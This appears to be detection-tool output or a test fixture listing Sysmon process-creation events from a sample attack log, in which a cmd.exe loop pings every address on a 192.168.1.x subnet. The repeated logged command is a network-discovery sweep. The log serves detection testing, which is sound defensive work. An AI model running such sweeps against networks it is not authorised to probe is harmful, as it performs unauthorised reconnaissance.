+2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.170  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.171  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.172  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.173  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.174  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.175  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.176  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.177  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.178  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.179  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.180  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.181  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.182  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.183  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.184  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.185  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.186  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.187  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.188  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.189  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.190  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.191  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.192  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.193  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.194  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.195  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.196  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.197  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.198  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.199  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.200  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.201  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.202  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.203  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.204  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.205  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.206  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.207  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.208  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.209  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.210  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.211  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.212  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.213  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.214  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.215  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.216  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.217  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.218  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.219  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.220  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.221  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.222  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.223  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
